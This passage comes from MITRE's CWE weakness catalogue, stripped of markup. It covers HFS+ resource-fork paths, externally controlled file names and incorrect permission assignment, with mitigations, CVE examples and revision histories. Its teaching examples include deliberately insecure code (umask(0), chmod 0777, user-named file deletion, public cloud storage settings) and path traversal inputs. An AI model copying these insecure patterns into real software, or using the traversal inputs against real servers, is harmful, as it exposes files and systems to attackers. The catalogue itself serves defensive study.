+ + CWE Content Team + MITRE + 2009-03-10 + updated Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2013-02-21 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Name, Relationships + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Applicable_Platforms, Relationships, Type + + + CWE Content Team + MITRE + 2022-04-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Coding Standards Violation + + + + The product does not properly handle special paths that may identify the data or resource fork of a file on the HFS+ file system. + If the product chooses actions to take based on the file name, then if an attacker provides the data or resource fork, the product may take unexpected actions. Further, if the product intends to restrict access to a file, then an attacker might still be able to bypass intended access restrictions by requesting the data or resource fork for that file. + + + + + + + + + + The Apple HFS+ file system permits files to have multiple data input streams, accessible through special paths. The Mac OS X operating system provides a way to access the different data input streams through special paths and as an extended attribute: + + - Resource fork: file/..namedfork/rsrc, file/rsrc (deprecated), xattr:com.apple.ResourceFork + - Data fork: file/..namedfork/data (only versions prior to Mac OS X v10.5) + + Additionally, on filesystems that lack native support for multiple streams, the resource fork and file metadata may be stored in a file with "._" prepended to the name. + Forks can also be accessed through non-portable APIs. + Forks inherit the file system access controls of the file they belong to. + Programs need to control access to these paths, if the processing of a file system object is dependent on the structure of its path. + + + + + Implementation + + + + + Confidentiality + Integrity + Read Files or Directories + Modify Files or Directories + + + + + A web server that interprets FILE.cgi as processing instructions could disclose the source code for FILE.cgi by requesting FILE.cgi/..namedfork/data. This might occur because the web server invokes the default handler which may return the contents of the file. + + + + + CVE-2004-1084 + Server allows remote attackers to read files and resource fork content via HTTP requests to certain special file names related to multiple data streams in HFS+. + https://www.cve.org/CVERecord?id=CVE-2004-1084 + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + This and similar problems exist because the same resource can have multiple identifiers that dictate which behavior can be performed on the resource. + Under-studied + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings + + + David Remahl + Apple + 2008-11-05 + clarified description, provided background details, and added demonstrative example + + + CWE Content Team + MITRE + 2008-11-24 + updated Applicable_Platforms, Background_Details, Demonstrative_Examples, Description, Name, References + + + CWE Content Team + MITRE + 2009-05-27 + updated Name + + + CWE Content Team + MITRE + 2009-10-29 + updated Other_Notes, Theoretical_Notes + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Apple HFS+ Alternate Data Stream + Failure to Handle Apple HFS+ Alternate Data Stream Path + + + + The product allows user input to control or influence paths or file names that are used in filesystem operations. + + This could allow an attacker to access or modify system files or other files that are critical to the application. + Path manipulation errors occur when the following two conditions are met: + + 1. An attacker can specify a path used in an operation on the filesystem. + 2. By specifying the resource, the attacker gains a capability that would not otherwise be permitted. + + For example, the program may give the attacker the ability to overwrite the specified file or run with a configuration controlled by the attacker. + + + + + + + + + + + + + + Primary + + + + + + + + + + + Architecture and Design + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + High + + + Integrity + Confidentiality + Read Files or Directories + Modify Files or Directories + The application can operate on unexpected files. Confidentiality is violated when the targeted filename is not directly readable by the attacker. + + + Integrity + Confidentiality + Availability + Modify Files or Directories + Execute Unauthorized Code or Commands + The application can operate on unexpected files. This may violate integrity if the filename is written to, or if the filename is for a program or other form of executable code. + + + Availability + DoS: Crash, Exit, or Restart + DoS: Resource Consumption (Other) + The application can operate on unexpected files. Availability can be violated if the attacker specifies an unexpected file that the application modifies. Availability can also be affected if the attacker specifies a filename for a large file, or points to a special device or a file that does not have the format that the application expects. + + + + + Automated Static Analysis + + The external control or influence of filenames can often be detected using automated static analysis that models data flow within the product. + Automated static analysis might not be able to recognize when proper input validation is being performed, leading to false positives - i.e., warnings that do not have any security consequences or require any code changes. + + + + + + Architecture and Design + When the set of filenames is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames, and reject all other inputs. For example, ID 1 could map to "inbox.txt" and ID 2 could map to "profile.txt". Features such as the ESAPI AccessReferenceMap provide this capability. + + + Architecture and Design + Operation + + Run your code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict all access to files within a particular directory. + Examples include the Unix chroot jail and AppArmor. In general, managed code may provide some protection. + This may not be a feasible solution, and it only limits the impact to the operating system; the rest of your application may still be subject to compromise. + Be careful to avoid CWE-243 and other weaknesses related to jails. + + + + Architecture and Design + For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server. + + + Implementation + Input Validation + + Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. + When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." + Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. + When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single "." character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as "/" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434. + Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering "/" is insufficient protection if the filesystem also supports the use of "\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if "../" sequences are removed from the ".../...//" string in a sequential fashion, two instances of "../" would be removed from the original string, but the remaining characters would still form the "../" string. + + High + + + Implementation + Use a built-in path canonicalization function (such as realpath() in C) that produces the canonical version of the pathname, which effectively removes ".." sequences and symbolic links (CWE-23, CWE-59). + + + Installation + Operation + Use OS-level permissions and run as a low-privileged user to limit the scope of any successful attack. + + + Operation + Implementation + If you are using PHP, configure your application so that it does not use register_globals. During implementation, develop your application so that it does not rely on this feature, but be wary of implementing a register_globals emulation that is subject to weaknesses such as CWE-95, CWE-621, and similar issues. + + + Testing + Use tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session. These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules. + + + + + The following code uses input from an HTTP request to create a file name. The programmer has not considered the possibility that an attacker could provide a file name such as "../../tomcat/conf/server.xml", which causes the application to delete one of its own configuration files (CWE-22). + + String rName = request.getParameter("reportName");File rFile = new File("/usr/local/apfr/reports/" + rName);...rFile.delete(); + + + + The following code uses input from a configuration file to determine which file to open and echo back to the user. If the program runs with privileges and malicious users can change the configuration file, they can use the program to read any file on the system that ends with the extension .txt. + + fis = new FileInputStream(cfg.getProperty("sub")+".txt");amt = fis.read(arr);out.println(arr); + + + + + + CVE-2008-5748 + Chain: external control of values for user's desired language and theme enables path traversal. + https://www.cve.org/CVERecord?id=CVE-2008-5748 + + + CVE-2008-5764 + Chain: external control of user's target language enables remote file inclusion. + https://www.cve.org/CVERecord?id=CVE-2008-5764 + + + + + Path Manipulation + + + SFP16 + Path Traversal + + + + + + + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + CWE-114 is a Class, but it is listed a child of CWE-73 in view 1000. This suggests some abstraction problems that should be resolved in future versions. + + The external control of filenames can be the primary link in chains with other file-related weaknesses, as seen in the CanPrecede relationships. This is because software systems use files for many different purposes: to execute programs, load code libraries, to store application data, to store configuration settings, record temporary data, act as signals or semaphores to other processes, etc. + However, those weaknesses do not always require external control. For example, link-following weaknesses (CWE-59) often involve pathnames that are not controllable by the attacker at all. + The external control can be resultant from other issues. For example, in PHP applications, the register_globals setting can allow an attacker to modify variables that the programmer thought were immutable, enabling file inclusion (CWE-98) and path traversal (CWE-22). Operating with excessive privileges (CWE-250) might allow an attacker to specify an input filename that is not directly readable by the attacker, but is accessible to the privileged program. A buffer overflow (CWE-119) might give an attacker control over nearby memory locations that are related to pathnames, but were not directly modifiable by the attacker. + + + + + 7 Pernicious Kingdoms + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2009-01-12 + updated Applicable_Platforms, Causal_Nature, Common_Consequences, Demonstrative_Examples, Description, Observed_Examples, Other_Notes, Potential_Mitigations, References, Relationship_Notes, Relationships, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2009-03-10 + updated Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2009-07-27 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2009-10-29 + updated Common_Consequences, Description + + + CWE Content Team + MITRE + 2009-12-28 + updated Detection_Factors + + + CWE Content Team + MITRE + 2010-02-16 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-09-13 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Demonstrative_Examples, References, Related_Attack_Patterns, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Likelihood_of_Exploit, Modes_of_Introduction, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated Potential_Mitigations, References, Relationships, Time_of_Introduction, Type + + + CWE Content Team + MITRE + 2020-06-25 + updated Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Maintenance_Notes, Potential_Mitigations + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Detection_Factors, Potential_Mitigations + + + CWE Content Team + MITRE + 2023-04-27 + updated Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Path Manipulation + + + + The product specifies permissions for a security-critical resource in a way that allows that resource to be read or modified by unintended actors. + When a resource is given a permission setting that provides access to a wider range of actors than required, it could lead to the exposure of sensitive information, or the modification of that resource by unintended parties. This is especially dangerous when the resource is related to program configuration, execution, or sensitive user data. For example, consider a misconfigured storage account for the cloud that can be read or written by a public or anonymous user. + + + + + + + + + + + + Architecture and Design + + + Implementation + + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + The developer might make certain assumptions about the environment in which the product operates - e.g., that the software is running on a single-user system, or the software is only accessible to trusted administrators. When the software is running in a different environment, the permissions become a problem. + + + + Installation + The developer may set loose permissions in order to minimize problems when the user first runs the program, then create documentation stating that permissions should be tightened. Since system administrators and users do not always read the documentation, this can result in insecure permissions being left unchanged. + + + Operation + + + High + + + Confidentiality + Read Application Data + Read Files or Directories + An attacker may be able to read sensitive information from the associated resource, such as credentials or configuration information stored in a file. + + + Access Control + Gain Privileges or Assume Identity + An attacker may be able to modify critical properties of the associated resource to gain privileges, such as replacing a world-writable executable with a Trojan horse. + + + Integrity + Other + Modify Application Data + Other + An attacker may be able to destroy or corrupt critical data in the associated resource, such as deletion of records from a database. + + + + + Automated Static Analysis + + Automated static analysis may be effective in detecting permission problems for system resources such as files, directories, shared memory, device interfaces, etc. Automated techniques may be able to detect the use of library functions that modify permissions, then analyze function calls for arguments that contain potentially insecure values. + However, since the software's intended security policy might allow loose permissions for certain operations (such as publishing a file on a web server), automated static analysis may produce some false positives - i.e., warnings that do not have any security consequences or require any code changes. + When custom permissions models are used - such as defining who can read messages in a particular forum in a bulletin board system - these can be difficult to detect using automated static analysis. It may be possible to define custom signatures that identify any custom functions that implement the permission checks and assignments. + + + + Automated Dynamic Analysis + + Automated dynamic analysis may be effective in detecting permission problems for system resources such as files, directories, shared memory, device interfaces, etc. + However, since the software's intended security policy might allow loose permissions for certain operations (such as publishing a file on a web server), automated dynamic analysis may produce some false positives - i.e., warnings that do not have any security consequences or require any code changes. + When custom permissions models are used - such as defining who can read messages in a particular forum in a bulletin board system - these can be difficult to detect using automated dynamic analysis. It may be possible to define custom signatures that identify any custom functions that implement the permission checks and assignments. + + + + Manual Analysis + This weakness can be detected using tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session. + These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules. + + + Manual Static Analysis + Manual static analysis may be effective in detecting the use of custom permissions models and functions. The code could then be examined to identifying usage of the related functions. Then the human analyst could evaluate permission assignments in the context of the intended security model of the software. + + + Manual Dynamic Analysis + Manual dynamic analysis may be effective in detecting the use of custom permissions models and functions. The program could then be executed with a focus on exercising code paths that are related to the custom permissions. Then the human analyst could evaluate permission assignments in the context of the intended security model of the software. + + + Fuzzing + Fuzzing is not effective in detecting this weakness. + + + Black Box + + Use monitoring tools that examine the software's process as it interacts with the operating system and the network. This technique is useful in cases when source code is unavailable, if the software was not developed by you, or if you want to verify that the build phase did not introduce any new weaknesses. Examples include debuggers that directly attach to the running process; system-call tracing utilities such as truss (Solaris) and strace (Linux); system activity monitors such as FileMon, RegMon, Process Monitor, and other Sysinternals utilities (Windows); and sniffers and protocol analyzers that monitor network traffic. + Attach the monitor to the process and watch for library functions or system calls on OS resources such as files, directories, and shared memory. Examine the arguments to these calls to infer which permissions are being used. + + Note that this technique is only useful for permissions issues related to system resources. It is not likely to detect application-level business rules that are related to permissions, such as if a user of a blog system marks a post as "private," but the blog system inadvertently marks it as "public." + + + Automated Static Analysis - Binary or Bytecode + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Inter-application Flow Analysis + + + + SOAR Partial + + + Manual Static Analysis - Binary or Bytecode + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies + + + + SOAR Partial + + + Dynamic Analysis with Automated Results Interpretation + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Host-based Vulnerability Scanners - Examine configuration for flaws, verifying that audit mechanisms work, ensure host configuration meets certain predefined criteria + Web Application Scanner + Web Services Scanner + Database Scanners + + + + SOAR Partial + + + Dynamic Analysis with Manual Results Interpretation + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Host Application Interface Scanner + + Cost effective for partial coverage: + + Fuzz Tester + Framework-based Fuzzer + Automated Monitored Execution + Forced Path Execution + + + + High + + + Manual Static Analysis - Source Code + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Manual Source Code Review (not inspections) + + Cost effective for partial coverage: + + Focused Manual Spotcheck - Focused manual analysis of source + + + + High + + + Automated Static Analysis - Source Code + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Context-configured Source Code Weakness Analyzer + + + + SOAR Partial + + + Automated Static Analysis + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Configuration Checker + + + + SOAR Partial + + + Architecture or Design Review + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Formal Methods / Correct-By-Construction + + Cost effective for partial coverage: + + Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.) + + + + High + + + + + Implementation + When using a critical resource such as a configuration file, check to see if the resource has insecure permissions (such as being modifiable by any regular user) [REF-62], and generate an error or even exit the software if there is a possibility that the resource could have been modified by an unauthorized party. + + + Architecture and Design + Divide the software into anonymous, normal, privileged, and administrative areas. Reduce the attack surface by carefully defining distinct user groups, privileges, and/or roles. Map these against data, functionality, and the related resources. Then set the permissions accordingly. This will allow you to maintain more fine-grained control over your resources. [REF-207] + Moderate + This can be an effective strategy. However, in practice, it may be difficult or time consuming to define these areas when there are many different resources or user types, or if the applications features change rapidly. + + + Architecture and Design + Operation + Sandbox or Jail + + Run the code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software. + OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations. + This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise. + Be careful to avoid CWE-243 and other weaknesses related to jails. + + Limited + The effectiveness of this mitigation depends on the prevention capabilities of the specific sandbox or jail being used and might only help to reduce the scope of an attack, such as restricting the attacker to certain system calls or limiting the portion of the file system that can be accessed. + + + Implementation + Installation + During program startup, explicitly set the default permissions or umask to the most restrictive setting possible. Also set the appropriate permissions during program installation. This will prevent you from inheriting insecure permissions from any user who installs or runs the program. + High + + + System Configuration + For all configuration files, executables, and libraries, make sure that they are only readable and writable by the software's administrator. + High + + + Documentation + Do not suggest insecure configuration changes in documentation, especially if those configurations can extend to resources and other programs that are outside the scope of the application. + + + Installation + Do not assume that a system administrator will manually change the configuration to the settings that are recommended in the software's manual. + + + Operation + System Configuration + Environment Hardening + Ensure that the software runs properly under the United States Government Configuration Baseline (USGCB) [REF-199] or an equivalent hardening configuration guide, which many organizations use to limit the attack surface and potential risk of deployed software. + + + Implementation + System Configuration + Operation + When storing data in the cloud (e.g., S3 buckets, Azure blobs, Google Cloud Storage, etc.), use the provider's controls to disable public access. + + + + + The following code sets the umask of the process to 0 before creating a file and writing "Hello world" into the file. + + #define OUTFILE "hello.out" + umask(0);FILE *out; + /* Ignore link following (CWE-59) for brevity */ + + out = fopen(OUTFILE, "w");if (out) {fprintf(out, "hello world!\n");fclose(out);} + + After running this program on a UNIX system, running the "ls -l" command might return the following output: + + -rw-rw-rw- 1 username 13 Nov 24 17:58 hello.out + + The "rw-rw-rw-" string indicates that the owner, group, and world (all users) can read the file and write to it. + + + This code creates a home directory for a new user, and makes that user the owner of the directory. If the new directory cannot be owned by the user, the directory is deleted. + + function createUserDir($username){$path = '/home/'.$username;if(!mkdir($path)){return false;}if(!chown($path,$username)){rmdir($path);return false;}return true;} + + Because the optional "mode" argument is omitted from the call to mkdir(), the directory is created with the default permissions 0777. Simply setting the new user as the owner of the directory does not explicitly change the permissions of the directory, leaving it with the default. This default allows any user to read and write to the directory, allowing an attack on the user's files. The code also fails to change the owner group of the directory, which may result in access by unexpected groups. + This code may also be vulnerable to Path Traversal (CWE-22) attacks if an attacker supplies a non alphanumeric username. + + + The following code snippet might be used as a monitor to periodically record whether a web site is alive. To ensure that the file can always be modified, the code uses chmod() to make the file world-writable. + + $fileName = "secretFile.out"; + if (-e $fileName) {chmod 0777, $fileName;} + my $outFH;if (! open($outFH, ">>$fileName")) {ExitError("Couldn't append to $fileName: $!");}my $dateString = FormatCurrentTime();my $status = IsHostAlive("cwe.mitre.org");print $outFH "$dateString cwe status: $status!\n";close($outFH); + + The first time the program runs, it might create a new file that inherits the permissions from its environment. A file listing might look like: + + -rw-r--r-- 1 username 13 Nov 24 17:58 secretFile.out + + This listing might occur when the user has a default umask of 022, which is a common setting. Depending on the nature of the file, the user might not have intended to make it readable by everyone on the system. + The next time the program runs, however - and all subsequent executions - the chmod will set the file's permissions so that the owner, group, and world (all users) can read the file and write to it: + + -rw-rw-rw- 1 username 13 Nov 24 17:58 secretFile.out + + Perhaps the programmer tried to do this because a different process uses different permissions that might prevent the file from being updated. + + + This program creates and reads from an admin file to determine privilege information. + If the admin file doesn't exist, the program will create one. In order to create the file, the program must have write privileges to write to the file. After the file is created, the permissions need to be changed to read only. + + + const adminFile = "/etc/admin-users" + func createAdminFileIfNotExists() error { + + file, err := os.Create(adminFile) + if err != nil { + + return err + + } + return nil + } + + + func changeModeOfAdminFile() error { + + fileMode := os.FileMode(0440) + if err := os.Chmod(adminFile, fileMode); err != nil { + + return err + + } + return nil + } + + os.Create will create a file with 0666 permissions before umask if the specified file does not exist. A typical umask of 0022 would result in the file having 0644 permissions. That is, the file would have world-writable and world-readable permissions. + In this scenario, it is advised to use the more customizable method of os.OpenFile with the os.O_WRONLY and os.O_CREATE flags specifying 0640 permissions to create the admin file. + This is because on a typical system where the umask is 0022, the perm 0640 applied in os.OpenFile will result in a file of 0620 where only the owner and group can write. + + + The following command recursively sets world-readable permissions for a directory and all of its children: + + chmod -R ugo+r DIRNAME + + If this command is run from a program, the person calling the program might not expect that all the files under the directory will be world-readable. If the directory is expected to contain private data, this could become a security problem. + + + The following Azure command updates the settings for a storage account: + + az storage account update --name <storage-account> --resource-group <resource-group> --allow-blob-public-access true + + However, "Allow Blob Public Access" is set to true, meaning that anonymous/public users can access blobs. + The command could be modified to disable "Allow Blob Public Access" by setting it to false. + + az storage account update --name <storage-account> --resource-group <resource-group> --allow-blob-public-access false + + + + The following Google Cloud Storage command gets the settings for a storage account named 'BUCKET_NAME': + + + gsutil iam get gs://BUCKET_NAME + + + Suppose the command returns the following result: + + { + + "bindings":[{ + + "members":[ + + "projectEditor: PROJECT-ID", + "projectOwner: PROJECT-ID" + + ], + "role":"roles/storage.legacyBucketOwner" + + }, + { + + "members":[ + + "allUsers", + "projectViewer: PROJECT-ID" + ], + "role":"roles/storage.legacyBucketReader" + + } + + ] + + } + + This result includes the "allUsers" or IAM role added as members, causing this policy configuration to allow public access to cloud storage resources. There would be a similar concern if "allAuthenticatedUsers" was present. + The command could be modified to remove "allUsers" and/or "allAuthenticatedUsers" as follows: + + gsutil iam ch -d allUsers gs://BUCKET_NAME + gsutil iam ch -d allAuthenticatedUsers gs://BUCKET_NAME + + + + + + CVE-2022-29527 + Go application for cloud management creates a world-writable sudoers file that allows local attackers to inject sudo rules and escalate privileges to root by winning a race condition. + https://www.cve.org/CVERecord?id=CVE-2022-29527 + + + CVE-2009-3482 + Anti-virus product sets insecure "Everyone: Full Control" permissions for files under the "Program Files" folder, allowing attackers to replace executables with Trojan horses. + https://www.cve.org/CVERecord?id=CVE-2009-3482 + + + CVE-2009-3897 + Product creates directories with 0777 permissions at installation, allowing users to gain privileges and access a socket used for authentication. + https://www.cve.org/CVERecord?id=CVE-2009-3897 + + + CVE-2009-3489 + Photo editor installs a service with an insecure security descriptor, allowing users to stop or start the service, or execute commands as SYSTEM. + https://www.cve.org/CVERecord?id=CVE-2009-3489 + + + CVE-2020-15708 + socket created with insecure permissions + https://www.cve.org/CVERecord?id=CVE-2020-15708 + + + CVE-2009-3289 + Library function copies a file to a new target and uses the source file's permissions for the target, which is incorrect when the source file is a symbolic link, which typically has 0777 permissions. + https://www.cve.org/CVERecord?id=CVE-2009-3289 + + + CVE-2009-0115 + Device driver uses world-writable permissions for a socket file, allowing attackers to inject arbitrary commands. + https://www.cve.org/CVERecord?id=CVE-2009-0115 + + + CVE-2009-1073 + LDAP server stores a cleartext password in a world-readable file. + https://www.cve.org/CVERecord?id=CVE-2009-1073 + + + CVE-2009-0141 + Terminal emulator creates TTY devices with world-writable permissions, allowing an attacker to write to the terminals of other users. + https://www.cve.org/CVERecord?id=CVE-2009-0141 + + + CVE-2008-0662 + VPN product stores user credentials in a registry key with "Everyone: Full Control" permissions, allowing attackers to steal the credentials. + https://www.cve.org/CVERecord?id=CVE-2008-0662 + + + CVE-2008-0322 + Driver installs its device interface with "Everyone: Write" permissions. + https://www.cve.org/CVERecord?id=CVE-2008-0322 + + + CVE-2009-3939 + Driver installs a file with world-writable permissions. + https://www.cve.org/CVERecord?id=CVE-2009-3939 + + + CVE-2009-3611 + Product changes permissions to 0777 before deleting a backup; the permissions stay insecure for subsequent backups. + https://www.cve.org/CVERecord?id=CVE-2009-3611 + + + CVE-2007-6033 + Product creates a share with "Everyone: Full Control" permissions, allowing arbitrary program execution. + https://www.cve.org/CVERecord?id=CVE-2007-6033 + + + CVE-2007-5544 + Product uses "Everyone: Full Control" permissions for memory-mapped files (shared memory) in inter-process communication, allowing attackers to tamper with a session. + https://www.cve.org/CVERecord?id=CVE-2007-5544 + + + CVE-2005-4868 + Database product uses read/write permissions for everyone for its shared memory, allowing theft of credentials. + https://www.cve.org/CVERecord?id=CVE-2005-4868 + + + CVE-2004-1714 + Security product uses "Everyone: Full Control" permissions for its configuration files. + https://www.cve.org/CVERecord?id=CVE-2004-1714 + + + CVE-2001-0006 + "Everyone: Full Control" permissions assigned to a mutex allows users to disable network connectivity. + https://www.cve.org/CVERecord?id=CVE-2001-0006 + + + CVE-2002-0969 + Chain: database product contains buffer overflow that is only reachable through a .ini configuration file - which has "Everyone: Full Control" permissions. + https://www.cve.org/CVERecord?id=CVE-2002-0969 + + + + + FIO03-J + Create files with appropriate access permission + + + SEC01-J + Do not allow tainted variables in privileged blocks + + + ENV03-J + Do not grant dangerous combinations of permissions + + + FIO06-C + Create files with appropriate access permissions + + + + + + + + + + + + + + + + + + + + + + + + + + Allowed-with-Review + While the name itself indicates an assignment of permissions for resources, this is often misused for vulnerabilities in which "permissions" are not checked, which is an "authorization" weakness (CWE-285 or descendants) within CWE's model [REF-1287]. + Closely analyze the specific mistake that is allowing the resource to be exposed, and perform a CWE mapping for that mistake. + + + + + + The relationships between privileges, permissions, and actors (e.g. users and groups) need further refinement within the Research view. One complication is that these concepts apply to two different pillars, related to control of resources (CWE-664) and protection mechanism failures (CWE-693). + + + + CWE Content Team + MITRE + 2008-09-08 + 1.0 + 2008-09-09 + new weakness-focused entry for Research view. + + + CWE Content Team + MITRE + 2009-01-12 + updated Description, Likelihood_of_Exploit, Name, Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2009-03-10 + updated Potential_Mitigations, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2009-05-27 + updated Name + + + CWE Content Team + MITRE + 2009-12-28 + updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Detection_Factors, Modes_of_Introduction, Observed_Examples, Potential_Mitigations, References + + + CWE Content Team + MITRE + 2010-02-16 + updated Relationships + + + CWE Content Team + MITRE + 2010-04-05 + updated Potential_Mitigations, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2010-06-21 + updated Common_Consequences, Detection_Factors, Potential_Mitigations, References, Relationships + + + CWE Content Team + MITRE + 2010-09-27 + updated Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2010-12-13 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-03-29 + updated Demonstrative_Examples, Description, Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-27 + updated Relationships + + + CWE Content Team + MITRE + 2011-09-13 + updated Potential_Mitigations, References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated References, Related_Attack_Patterns, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2013-07-17 + updated References + + + CWE Content Team + MITRE + 2014-07-30 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2017-01-19 + updated Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Likelihood_of_Exploit, Modes_of_Introduction, References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-01-03 + updated Related_Attack_Patterns, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2019-09-19 + updated Maintenance_Notes, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Applicable_Platforms, Description, Detection_Factors, Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2021-07-20 + updated Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Demonstrative_Examples, Observed_Examples, References + + + CWE Content Team + MITRE + 2023-01-31 + updated Applicable_Platforms, Description, References + + + CWE Content Team + MITRE + 2023-04-27 + updated Demonstrative_Examples, Description, Potential_Mitigations, References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 